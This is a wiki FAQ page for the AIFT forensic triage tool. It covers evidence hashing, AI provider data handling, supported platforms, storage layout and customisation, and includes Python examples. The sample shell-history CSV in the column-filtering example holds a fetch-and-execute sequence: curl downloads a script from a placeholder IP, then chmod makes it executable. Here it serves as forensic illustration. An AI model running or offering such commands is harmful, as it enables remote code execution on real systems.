Flip Forensics edited this page Mar 31, 2026 · 3 revisions

Frequently Asked Questions


Is my evidence modified during analysis?

No. AIFT never writes to or modifies evidence files. The Dissect framework opens disk images in read-only mode. Integrity is verified with two hashes, SHA-256 and MD5: both are computed on intake and recomputed before report generation, and the report shows a PASS/FAIL result for the comparison. Hashing can optionally be disabled in Settings → Advanced for faster intake of large images, in which case the report shows SKIPPED. Treat SKIPPED as "not verified", not as a pass: with hashing off, the report can make no claim about whether the evidence changed between intake and reporting. MD5 is collision-prone; when cross-checking against hashes produced by another tool, rely on the SHA-256 value.
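The intake/verify cycle described above, as an added example (not AIFT's own code): the evidence is streamed through SHA-256 and MD5 in one pass, the digests are stored in an intake record, and before reporting the file is re-hashed and compared. The `intake.json` filename and the layout of the record are assumptions for this example; the sample "image" is a constructed file, not a real E01.

```python
import hashlib
import hmac
import io
import json
import tempfile
from pathlib import Path

CHUNK_SIZE = 1024 * 1024  # stream the image in 1 MiB pieces; never load it whole


def hash_stream(fh):
    """Compute SHA-256 and MD5 over a binary stream in a single pass; return hex digests."""
    sha256, md5 = hashlib.sha256(), hashlib.md5()
    for chunk in iter(lambda: fh.read(CHUNK_SIZE), b""):
        sha256.update(chunk)
        md5.update(chunk)
    return {"sha256": sha256.hexdigest(), "md5": md5.hexdigest()}


def hash_bytes(data):
    """Same routine over in-memory bytes (handy for checking against known vectors)."""
    return hash_stream(io.BytesIO(data))


def compute_hashes(path):
    """Hash an evidence file opened read-only; the file is never written to."""
    with open(path, "rb") as fh:
        return hash_stream(fh)


def record_intake(evidence_path, case_dir, hashing_enabled=True):
    """Intake step: persist the hashes, or None when hashing was disabled in settings.
    The intake.json record name is an assumption made for this example."""
    case_dir = Path(case_dir)
    case_dir.mkdir(parents=True, exist_ok=True)
    record = {
        "evidence": str(evidence_path),
        "hashes": compute_hashes(evidence_path) if hashing_enabled else None,
    }
    (case_dir / "intake.json").write_text(json.dumps(record))
    return record


def verify_for_report(evidence_path, case_dir):
    """Pre-report step: re-hash the evidence and compare with the intake record.
    Returns PASS, FAIL or SKIPPED, the three states the report can show."""
    record = json.loads((Path(case_dir) / "intake.json").read_text())
    if record["hashes"] is None:
        return "SKIPPED"  # hashing was off at intake, so there is nothing to compare
    current = compute_hashes(evidence_path)
    # both digests must match; compare_digest avoids timing side channels on the hex strings
    ok = all(hmac.compare_digest(current[k], record["hashes"][k]) for k in ("sha256", "md5"))
    return "PASS" if ok else "FAIL"


def demo():
    """Exercise all three outcomes in a throwaway directory and return them."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        evidence = tmp / "disk.E01"  # constructed stand-in, not a real E01 image
        evidence.write_bytes(b"constructed evidence bytes\n" * 4096)

        record_intake(evidence, tmp / "case_a")
        untouched = verify_for_report(evidence, tmp / "case_a")

        record_intake(evidence, tmp / "case_b", hashing_enabled=False)
        skipped = verify_for_report(evidence, tmp / "case_b")

        # Flip one byte to simulate tampering (something AIFT itself never does).
        with open(evidence, "r+b") as fh:
            fh.seek(0)
            fh.write(b"X")
        tampered = verify_for_report(evidence, tmp / "case_a")

    return untouched, tampered, skipped


if __name__ == "__main__":
    print(demo())  # ('PASS', 'FAIL', 'SKIPPED')
```

Running the block prints the three states in order. Note that a single flipped byte fails both digests, and that the SKIPPED case carries no integrity information at all, which is why it should be called out separately in any report you hand to an examiner.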


Is my data sent to the cloud?

It depends on your AI provider.

  • Claude, OpenAI, or Kimi: Parsed artifact data (CSV excerpts) is sent to the provider's API servers for analysis. The original disk image is never sent — only extracted and filtered artifact records.
  • Local model (Ollama, LM Studio, vLLM): Everything stays on your machine. No data leaves your network. Set ai.provider to local for fully offline operation.

Choose your provider based on the sensitivity of the evidence.


Can I use AIFT output in court?

AIFT is a triage tool that accelerates initial forensic analysis. Every report includes this disclaimer:

"This report was generated with AI assistance. All findings should be independently verified by a qualified forensic examiner before being used in any legal or formal proceeding."

AIFT supports defensibility through hash-verified evidence integrity, an append-only audit trail, saved prompts for reproducibility, citation spot-checking, and AI confidence ratings (HIGH/MEDIUM/LOW). None of this replaces independent verification: a qualified examiner must confirm every finding before it is submitted in any legal, regulatory, or formal proceeding.


What Python versions are supported?

Python 3.10 through 3.13 (inclusive).

Python 3.9 and earlier lack required language features. Python 3.14+ is not yet supported due to potential breaking changes in dependencies, particularly the Dissect framework. If you run an unsupported version, AIFT exits immediately with a clear error message recommending Python 3.13.


Can I analyze Linux or macOS disk images?

Linux is fully supported. AIFT automatically detects the OS type when the image is opened and presents the appropriate artifact set — 25 Windows artifacts or 19 Linux artifacts. Linux support covers shell history (bash, zsh, fish), authentication logs (wtmp, btmp, lastlog), user/group accounts, sudoers, syslog, systemd journal, cron jobs, systemd services, SSH keys, package history, and network interfaces. Each Linux artifact has dedicated forensic analysis prompts.

macOS is not currently supported. The Dissect framework supports macOS, but AIFT's artifact selection and AI prompts have not yet been built for macOS forensics.


How much does it cost to use?

AIFT itself is free. AI provider costs vary:

  • Local models: $0 — runs on your own hardware
  • Cloud providers: Costs depend on the provider and model. A typical full analysis with multiple artifacts may use 50K–200K tokens. Approximate per-analysis costs range from under $1 to a few dollars depending on the model and amount of artifact data.

You are responsible for your own API key and associated costs.


Can I run multiple analyses simultaneously?

No. AIFT is a single-process, single-user application. It uses background threads for parsing and analysis but is designed for one active session at a time. Running multiple browser tabs against the same instance may cause unexpected behavior.


Where is my data stored?

All case data is stored locally in the cases/ directory under the project root. Each analysis gets a UUID directory:

cases/<uuid>/
├── audit.jsonl          # Append-only audit trail
├── case.json            # Case metadata
├── evidence/            # Uploaded evidence files (upload mode only)
├── parsed/              # Parsed artifact CSV files
├── prompts/             # Every prompt sent to the AI
└── report/              # Generated HTML report

No database is used. All data is in CSV, JSON, and JSONL files on disk.


Can I customize what the AI looks for?

Yes, in several ways:

  1. Investigation context — When setting up an analysis, you provide a free-text description of the investigation (dates, suspects, IOCs, what you're looking for). This is included in the AI prompt and directly shapes the analysis focus.

  2. Artifact column filtering — Edit config/artifact_ai_columns.yaml to control which CSV columns are sent to the AI per artifact type. This reduces noise and focuses the AI on forensically relevant fields. See Configuration Reference.

  3. Prompt templates — The prompt templates in the project-level prompts/ directory (distinct from the per-case prompts/ folder, which stores the prompts actually sent) control how the AI is instructed. The system prompt, artifact analysis prompt, chunk merge prompt, and summary prompt each have their own file there, so you can read exactly what the model is told at each stage.
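Column filtering (item 2 above), as an added example that is not AIFT's own code: a per-artifact column list is applied to a parsed artifact CSV before the excerpt is built for the prompt. The mapping is written here as a Python dict so the example runs without a YAML parser; its shape (artifact type to ordered column list) is an assumption about config/artifact_ai_columns.yaml, and the CSV content is constructed sample data, not output from a real system.

```python
import csv
import io

# Assumed shape of config/artifact_ai_columns.yaml, expressed as a dict so this runs
# without PyYAML: artifact type -> columns to send to the AI, in the order to send them.
AI_COLUMNS = {
    "shell_history": ["timestamp", "user", "command"],
    "wtmp": ["timestamp", "user", "source_host", "event"],
}

# Constructed sample of a parsed shell-history CSV (not case data from any real host).
# source_path and line_no are useful for citations but add little for the AI, so the
# config above leaves them out of the excerpt.
SAMPLE_SHELL_HISTORY_CSV = """timestamp,user,command,source_path,line_no
2026-03-01T10:15:00Z,root,curl -o /tmp/x.sh http://203.0.113.5/x.sh,/root/.bash_history,41
2026-03-01T10:16:00Z,root,chmod +x /tmp/x.sh,/root/.bash_history,42
2026-03-01T10:16:30Z,alice,ls -la,/home/alice/.zsh_history,7
"""


def filter_columns(artifact, csv_text, config=AI_COLUMNS):
    """Keep only the configured columns for this artifact type, in config order.

    Returns (header, rows, missing). 'missing' lists configured columns the CSV does
    not have, so a typo in the config surfaces instead of silently dropping a field.
    An artifact with no config entry passes through unfiltered (an assumption here).
    """
    reader = csv.DictReader(io.StringIO(csv_text))
    fieldnames = reader.fieldnames or []
    wanted = config.get(artifact, fieldnames)
    header = [c for c in wanted if c in fieldnames]
    missing = [c for c in wanted if c not in fieldnames]
    rows = [[row[c] for c in header] for row in reader]
    return header, rows, missing


def to_excerpt(header, rows):
    """Serialise the filtered table back to CSV text, the form that goes into the prompt."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(header)
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    hdr, rws, miss = filter_columns("shell_history", SAMPLE_SHELL_HISTORY_CSV)
    if miss:
        print("WARNING: configured columns not in CSV:", miss)
    print(to_excerpt(hdr, rws))
```

The excerpt for the sample shrinks from five columns to three; on a real artifact with thousands of rows that difference is what keeps the prompt within the provider's context window and keeps path and offset noise away from the model. Checking `missing` before sending is the practitioner's safeguard: a misspelled column name in the config should be loud, not a silent gap in the analysis.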


What if my evidence file is too large to upload?

Use path mode. Instead of uploading through the browser, select the local path option in the evidence step and enter the filesystem path to your E01, ZIP, or directory. AIFT reads the evidence directly from disk without copying it, which is faster and avoids browser upload size limits.

You can also set a maximum upload size via Settings → Advanced → Evidence Size Threshold (GB). The default is 0 (unlimited). When set to a positive value, uploads exceeding the threshold are rejected with a suggestion to use path mode.


How do I update AIFT?

Pull the latest code and reinstall dependencies:

git pull
pip install -r requirements.txt

Your existing config.yaml will be preserved — new default settings are merged automatically on startup. Case data in cases/ is not affected by updates.
